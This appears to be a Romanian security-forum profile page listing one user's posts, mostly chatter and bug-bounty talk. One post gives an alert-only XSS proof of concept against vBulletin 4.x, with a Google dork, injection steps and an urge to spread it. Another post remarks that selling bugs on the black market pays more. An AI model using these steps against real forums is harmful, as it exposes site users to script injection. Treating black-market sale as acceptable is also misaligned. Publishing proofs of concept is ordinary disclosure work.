Jump to content

sensi

Active Members
 View Profile  See their activity

  • Posts

    574

  • Joined

  • Last visited

  • Days Won

    3

 Content Type 

Everything posted by sensi

  1. sensi
    Ala e in New Topic daca ai observat, daca e old, comunitatile in care am gasit trebuia sa-l fi reparat inainte sa raportez eu;)).
  2. sensi
    Dupa mai multe mesaje primite, am decis sa public vulnerabilitatile gasite in vBulletin, poate unii o sa se bucure, altii nu. Acesta fiind primul meu exploit, sper sa va placa. Eu zic sa raspandim exploit-ul, facem putina reclama RST-ului. ########################################################################################## # -#-#- vBulletin 4.x.x - Multiple Cross-Site-Scripting Vulnerabilities -#-#- # -#-#- RSTforums.com -#-#- # # # • Exploit Title: vBulletin 4.x.x - Multiple Cross-Site-Scripting Vulnerabilities - Reflected # • Google Dork: "Powered by vBulletin® Version 4.x.x" # • Date: 13.08.2013 # • Exploit Author: Sensi # • Website: RSTforums.com # • Software Link: http://vbulletin.com/ # • Version: vBulletin 4.x.x # • Tested on: Linux & Windows # • Special thanks to: [URL="https://rstforums.com/forum/members/kalash1337/"]Kalash1337 [/URL] # ########################################################################################## # # ### First XSS ### # # Step 1: Go to -> Any post -> Press Editpost(advanced editor) -> Inspect 'title' element source and delete maxlength="85" # (Direct Link:) [url]http://localhost/[/url][path]/editpost.php?p=[post number]&do=editpost # # Step 2: Add a malicious vector on title element. # (Example:) sensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensi"><script>alert(/sensi @ RSTforums.com/);</script> # #________________________________________________________________________________________ #======================================================================================== #---------------------------------------------------------------------------------------- # # ### Second XSS ### # # Step 1: Go to -> Any thread -> Press post new reply(advanced editor) -> Inspect 'title' element source and delete maxlength="85" # (Direct Link:) [url]http://localhost/[/url][path]/newreply.php?p=[post number]&noquote=1 # # Step 2: Add a malicious vector on title element. # (Example:) sensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensi"><script>alert(/sensi @ RSTforums.com/);</script> ########################################################################################## # # # Author will be not responsible for any damage caused! User assumes all responsibility. # # ##########################################################################################
  3. sensi

    Stiri securitate

    sensi replied to Kabron's topic in Off-topic

    Mai adaug, daca chiar n-ai altceva de facut, poti posta si tutoriale, exploit-uri, tool-uri, poti ajuta membrii noi.
  4. sensi
  5. sensi

    Image upload

    sensi replied to Nytro's topic in Linkuri

    IceImg — ??????? ??????????? http://iceimg.com/i/3a/7f/466ad36fd9.jpg - Link direct
  6. sensi
    La multi ani!
  7. sensi

    [HOF] apple.com

    sensi replied to dancezar's topic in Bug Bounty

    Felicitari! Niciodata nu e prea tarziu.
  8. sensi

    [XSS] Paypal.com

    sensi replied to sensi's topic in Bug Bounty

    La primul XSS persistent ma vezi pe black Nu vreau sa incurajez asta, dar asta e adevarul, pe black scoti mult mai mult.
  9. sensi

    [XSS] Paypal.com

    sensi replied to sensi's topic in Bug Bounty

    In primul rand vreau sa-mi cer scuze pentru dublu post! Hello ---------, ([U]vreau sa precizez ca nici nu mi-au scris numele corect[/U]) Thank you for participating in the PayPal Bug Bounty Program. We regret to inform you that your bug submission was not eligible for a bounty as this bug was already discovered by another researcher. Title: [Cross-Site-Scripting] www.paypal.com UID: yx1175uS Thank you for your participation. We take pride in keeping PayPal the safer place for online payment. Thank you, PayPal Security Team XSS-ul era ceva asemanator cu cel care l-am gasit aici, deci slabe sanse sa fi gasit altcineva... MUIE PAYPAL!
  10. sensi

    [XSS] Paypal.com

    sensi replied to sensi's topic in Bug Bounty

    Mersi baieti!
  11. sensi

    [XSS] Paypal.com

    sensi replied to sensi's topic in Bug Bounty

    Yes, I was logged and thanks.
  12. sensi

    [XSS] Paypal.com

    sensi replied to sensi's topic in Bug Bounty

    Teoretic ar trebuii sa primesc 750$
  13. sensi

    [XSS] Paypal.com

    sensi replied to sensi's topic in Bug Bounty

    Multumesc!
  14. sensi
    - Exploit: Paypal.com - Cross Site Scripting - Author: sensi - Browser: Firefox 23.0 - Status: Reported! - P.o.C: Error:
  15. sensi
    Dupa ce ca-ti ofera gratis, mai si comentezi. Facepalm!
  16. sensi
    ksfajk aksjfkla
  17. sensi

    Buna seara!

    sensi replied to coffeeman's topic in Bine ai venit

    Bine ai venit, sedere placuta! https://www.youtube.com/watch?v=a4I_2GxrQPM
  18. sensi

    Fun stuff

    sensi replied to Wisa's topic in Discutii non-IT

  19. sensi
    Old style, Firefox. // WTF ?!
  20. sensi
    La fel
  21. sensi

    TomTom [ EUROPA ]

    sensi replied to TheOne's topic in Off-topic

    As avea si eu nevoie daca mai e loc ...
  22. sensi
    La multi ani! , app cati ani ai implinit ?
  23. sensi
    @The Time, ce versiune de Chrome folosesti?
  24. sensi
    View image: madar facar
  25. sensi
    @TheTime, esti 100% sigur ? @Zatarra, nu toti fac ceva pentru rasplata, poate unii vor sa invete/exerseze . @Sweby, daca nu poti face challenge-ul, nu trebuie sa te apuci sa iei omu' la pula. p.s: in 30 min il fac. Un filtru dasta mi-a vandut si mie
×
×
  • Create New...